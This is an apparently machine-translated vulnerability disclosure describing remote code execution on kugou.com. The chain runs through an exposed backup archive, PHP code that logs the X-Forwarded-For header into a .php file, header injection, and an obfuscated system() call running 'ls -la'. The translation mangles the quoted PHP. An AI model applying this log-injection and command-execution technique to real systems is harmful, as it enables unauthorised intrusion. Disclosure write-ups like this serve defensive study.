Last night, the cool dog main site was able to get Getshell (fast recovery speed)

Last night, the cool dog main site was able to get Getshell (fast recovery speed)

After a sleep, I got up and found that the vulnerability was completed. Do you want to be so fast during the weekend !!!!!

The problem is that

Backup file found in the codoon Main Site

Http://www.kugou.com/www.kugou.com.tar.gz
 

Next, I will see the old backup of the main site.
 

I was prepared to submit it first, but I found that the backup was deleted after a while.

On the 9th, you can find a direct getshell.

ErrorPage/pc_errorhelp.php

ErrorPage/pc_errorhelp2.php
 

$ Preg = '/Windows NT (\ d)/U ';

@ Preg_match ($ preg, $ _ SERVER ['HTTP _ USER_AGENT '], $ match );

$ Win = empty ($ match [1])? 5: (int) $ match [1];

$ IsFirstTime = empty ($ _ COOKIE ['ieor']);

@ Setcookie ("IEor", 1, time () + 3600*24, '/', '.kugou.com'); // check whether the backup check for cookie writing is normal.

$ Log = date ('Y-m-d H: I: s '). "\ t ". mygetIP (). "\ t ". $ ver. "\ t ". $ win. "\ t ". ($ isFirstTime? "First": "NotF"). PHP_EOL;

@ File_put_contents ('help _ log. php', $ log, FILE_APPEND );

Function MygetIP (){

$ RealIP = FALSE;

If (! Empty ($ _ SERVER ['HTTP _ CLIENT_IP ']) {

$ RealIP = $ _ SERVER ['HTTP _ CLIENT_IP '];

}

If (! Empty ($ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) {

$ Ips = explode (',', $ _ SERVER ['HTTP _ X_FORWARDED_FOR ']);

Foreach ($ ips as $ ip ){

$ Ip = trim ($ ip );

If (! IsLAN ($ ip) {// non-LAN

$ RealIP = $ ip;

Break;

}

}

}
 

Add a sentence to X-Forwarded-.
 

Http://www.kugou.com/errorPage/help_log.php access (Super card)
 

Search 99999 to prove successful
 

 

You can also execute commands

X = system (chr (108). chr (115). chr (32). chr (45). chr (108). chr (97 ));
 

I got sleepy. It was just a little bit faster in the early morning. I got up and found that the vulnerability was completed. I didn't expect the repair speed to be amazing.
 

A svn leak is provided.

Fyb.kugou.com
 

 

Solution:

Do not store backups in the root directory ~